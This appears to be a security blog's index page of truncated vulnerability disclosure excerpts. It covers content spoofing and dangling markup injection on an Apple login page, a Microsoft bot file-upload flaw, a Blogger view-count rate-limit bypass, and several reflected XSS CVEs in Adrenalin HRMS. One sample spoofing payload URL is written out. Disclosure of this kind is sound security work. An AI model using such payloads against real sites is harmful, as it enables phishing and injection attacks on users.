Cyber Security Universe

Content Spoofing is an injection in which user input is reflected as it is in the application response which can be used in phishing attacks. During the recon phase, I found itunesconnect.apple.com , a subdomain of apple and after digging into it, I had observed that the content of the error key parameter was reflecting back to the page as shown below Payload - https://itunesconnect.apple.com/login?errorKey=This%20message%20can%20be%20changed%20by%20attacker.%20This%20is%20content%20spoofing%20till%20now.%20Let%20try%20to%20exploit%20it%20further. With normal inline Cross-Site Scripting(XSS) payloads, the application was giving a blank pop-up. After trying different scenarios, I have observed that dangling markup injection is possible on the vulnerable parameters (errorKey) Let’s understand the concept of Dangling Markup Injection Dangling markup injection is very useful where we can’t find a way to execute our JavaScript due to input filters, content security policy,...

Microsoft Bot Unvalidated File Upload:  The security issue allows a malicious actor to upload any file without validating the extension or content type of the file. Acknowledgment : Microsoft Online Service Acknowledgements for July 2019 ( https://portal.msrc.microsoft.com/en-us/security-guidance/researcher-acknowledgments-online-services?rtc=1 )

The security issue allows a malicious actor to bypass the naive security implementation of rate limiters. This allows an attacker to abuse the functionality of profile view count and increases them indefinitely. The following are the steps to reproduce wherein I have used my own blogger account ( https://www.blogger.com/profile/09844396241453600561 )

As cyber security professional, I come across many various vulnerabilities from critical to low and sometimes informational(How to categorize- CVSS v3 ). Sometime back I was doing as usual my security assessment activity for a Bank(Confidential) for their HRMS web application which was 3rd party software whose vendor was "Adrenalin". CVE ID: CVE-2018-12653 Vulnerability Name: Reflected Cross Site Scripting(XSS) Product: Adrenalin HRMS Affected Version: 5.4.0 Credits: Rishu Ranjan CVE-2018-12653 Details The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2018-12653 to this issue provided by  MITRE Corporation (MITRE)(As Vendor is not CVE Numbering Authorities (CNAs) ) CVSS Score CVSS Base Score: 6.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Impact Subscore:2.7 Exploitability Subscore: 2.8 Current Description A Reflected Cross Site Scripting(XSS) Vulnerability was discovered in Adrenalin 5.4 HRMS which is publically availabl...

As cyber security professional, I come across many various vulnerabilities from critical to low and sometimes informational(How to categorize- CVSS v3 ). Sometime back I was doing as usual my security assessment activity for a Bank(Confidential) for their HRMS web application which was 3rd party software whose vendor was "Adrenalin". CVE ID: CVE-2018-12652 Vulnerability Name: Reflected Cross Site Scripting(XSS) Product: Adrenalin HRMS Affected Version: 5.4.0 Credits:    Rishu Ranjan  

As cyber security professional, I come across many various vulnerabilities from critical to low and sometimes informational(How to categorize- CVSS v3 ). Sometime back, I was doing as usual my security assessment activity for a Client (Confidential) for their HRMS web application which was 3rd party software whose vendor was "Adrenalin". CVE ID: CVE-2018-12651 Vulnerability Name: Reflected Cross Site Scripting(XSS) Product: Adrenalin HRMS Affected Version: 5.4 Source: MITRE Credits:    Rishu Ranjan  

As cyber security professional, I come across many various vulnerabilities from critical to low and sometimes informational(How to categorize- CVSS v3 ). Sometime back I was doing as usual my security assessment activity for a Client (Confidential) for their HRMS web application which was 3rd party software whose vendor was "Adrenalin". CVE ID: CVE-2018-12650 Vulnerability Name: Reflected Cross Site Scripting(XSS) Product: Adrenalin HRMS Affected Version: 5.4.0 Credits: Rishu Ranjan

As a cybersecurity expert, I come across a wide variety of vulnerabilities, ranging from critical severity to low severity and sometimes informative (Classification - CVSS v3). Some time ago, I was performing my security assessment as usual for a (confidential) customer for their HRMS web application, a third-party software whose vendor is " Adrenaline". CVE ID: CVE-2018-12234 Vulnerability Name: Reflected Cross Site Scripting(XSS) Product: Adrenalin HRMS Affected Version: 5.4.0 Source: MITRE Credits:    Rishu Ranjan   CVE-2018-12234 Details The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2018-12234 to this issue provided by  MITRE Corporation (MITRE)(As Vendor is not CVE Numbering Authorities (CNAs) ) CVSS Score CVSS Base Score: 6.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Impact Subscore:2.7 Exploitability Subscore: 2.8 Current Description A Reflected Cross Site Scripting(XSS) Vulnerability was discovered in...